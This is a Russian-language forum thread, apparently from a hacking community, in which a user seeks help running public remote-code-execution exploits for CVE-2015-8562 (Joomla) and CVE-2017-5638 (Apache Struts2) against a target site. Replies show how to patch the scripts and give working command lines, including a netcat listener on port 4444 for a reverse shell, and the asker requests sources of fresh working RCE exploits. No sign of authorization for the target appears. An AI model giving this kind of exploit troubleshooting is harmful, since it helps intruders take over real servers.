• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

CVE-2015-8562

K

kamaz

привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
 

DefWolf

Green Team
24.10.2017
288
795
BIT
0
привет!
пробую эксплойт с све из заголовка,получаю такую ошибку

[+] Attacking: mytarget.com
Traceback (most recent call last):
File "rce.py", line 155, in <module>
main()
File "rce.py", line 151, in main
x.exploit_target(target, ip, port)
File "rce.py", line 111, in exploit_target
print("[+] Target IP: " + socket.gethostbyname(url.split('/')[2]))
IndexError: list index out of range

пробую второй с све-CVE-2017-5638
# python CVE-2017-5638.py
Traceback (most recent call last):
File "CVE-2017-5638.py", line 11, in <module>
strutz = open(sys.argv[1], "r").readlines()
IndexError: list index out of range

мог бы кто-то указать на мои ошибки

спасибо
Напиши, а как ты их запускаешь ? python с последующими аргументами, если да, то кинь ссылку на эксплоиты
 
  • Нравится
Реакции: kamaz
K

kamaz

первый запускаю так

неткатом открываю порт 4444

после в терминале

python rce.py --target=mytarget.com --ip=myip --port=4444
 
K

kamaz

ссылки
hыы://github.com/r0otshell/Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638
ыы://github.com/anarcoder/CVE-2015-8562

в python rce.py-h это все взял там знаки стоят
второй даже хелп не отображает

тему можно закрывать ,DefWolf дал исчерпывающую информацию!за что ему большое человеческое спасибо!
 

Tayler

Green Team
08.07.2017
40
46
BIT
2
https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)
 
  • Нравится
Реакции: kamaz
K

kamaz

https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)
граматно,спасибо что не прошли мимо!
Подскажите где найти рабочие RCE эксплойты,где мониторить новые,может фраймворк существует какой-тов общем жилание знать все на эту тему.
спасибо

https://github.com/r0otshell/Apache...v2-CVE-2017-5638/blob/master/CVE-2017-5638.py
В этом сплойте тебя просили указать имя файла,где содержаться урл,можешь заменить 11 строку,если тебе нужен только один сайт и ты не хочешь париться на эту
Python:
strutz = [raw_input('')]

Что касается этого... https://github.com/anarcoder/CVE-2015-8562/blob/master/rce.py
Я могу лишь преположить,что разработчик допустил ошибку...хотяя...
Крч убирай в 110 строчке
Код:
.split('/')[2]

(Это я для будущего поколения расписал)

теперь такая ошибка
File "rce.py", line 113
headers = {'User-Agent': user_agent,
^
SyntaxError: invalid syntax
 
K

kamaz

в разных вариациях добовлял все равно ругается на то,что добовляю
 

dirtyharry

Green Team
25.11.2017
13
54
BIT
0
Ахтунг! Код работает без правок!

Код:
python3 rce.py --target='http://someshit.com' --ip='yourip' --port=4444

Второй тоже без проблем:

Код:
python CVE-2017-5638.py urls.txt ls
 

Вложения

  • Screenshot at 2018-01-14 17-51-44.png
    Screenshot at 2018-01-14 17-51-44.png
    7,4 КБ · Просмотры: 580
  • Screenshot at 2018-01-14 17-56-22.png
    Screenshot at 2018-01-14 17-56-22.png
    9,3 КБ · Просмотры: 541
Последнее редактирование:
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!